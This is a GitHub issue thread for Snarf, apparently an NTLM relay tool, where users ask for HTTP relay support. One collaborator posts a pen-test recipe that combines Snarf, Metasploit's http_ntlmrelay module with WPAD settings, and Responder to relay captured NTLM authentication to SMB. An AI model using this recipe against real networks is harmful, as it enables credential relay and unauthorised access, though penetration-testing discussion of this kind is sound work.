Feature Request - Support NTLMSSP/HTTP #4

Open
mubix opened this issue Jun 29, 2014 · 7 comments
Comments

@mubix

mubix commented Jun 29, 2014

Would be nice to be able to relay to HTTP sites.

@purpleteam
Owner

We've talked about (and I have a basic shell of PoC code) for snarfing HTTP connections where the first of a series of keep-alive requests are authenticated with NTLM or SPNEGO. This would allow you to tack on additional HTTP requests under that same authenticated context at least as long as the keep-alive lasts (not long on some web servers, alas). Is that what you mean?

Or do you mean turning inbound HTTP connections to outbound SMB?

Or do you mean turning inbound SMB connections to outbound HTTP?

@mubix
Author

mubix commented Jul 1, 2014

So, more and more, using Responder I find I receive HTTP-based NTLM auth more than SMB, and it would be nice to be able to use that against an SMB server or another NTLM-based web server.

@jephthai
Collaborator

I have an update on this. We do still intend to build this in, but for now there is a way to accomplish this. Here's what I found worked on a recent pen-test:

  • Run Snarf with a default IP ("-d" option) or a round-robin list ("-f" option)
    • sudo node snarf.js -d
    • NOTE: you don't have to change iptables at all, since this isn't MitM
  • Configure the Metasploit http_ntlmrelay module to relay to the Snarf server with the "SMB_LS" RTYPE
    • set URIPATH /wpad.dat
    • set SRVHOST
    • set SRVPORT 80
    • set RHOST
    • set RPORT 445
    • set RTYPE SMB_LS
  • Configure Responder to run with the HTTP server disabled
    • HTTP = Off
    • HTTPS = Off
  • Sit back and watch sessions come in every time there's a "wpad" request

@Lexus89

Lexus89 commented Mar 17, 2016

This would be awesome. Is it still under development?

@jephthai
Collaborator

Actually, yes -- and I believe we have some HTTP->SMB cross-protocol code that isn't checked in. I'll check with Victor (offenseindepth) and see.

@Lexus89

Lexus89 commented Mar 23, 2016

@jephthai Any update yet on the HTTP to SMB code?

@PowerPress

Any news? This would be awesome.
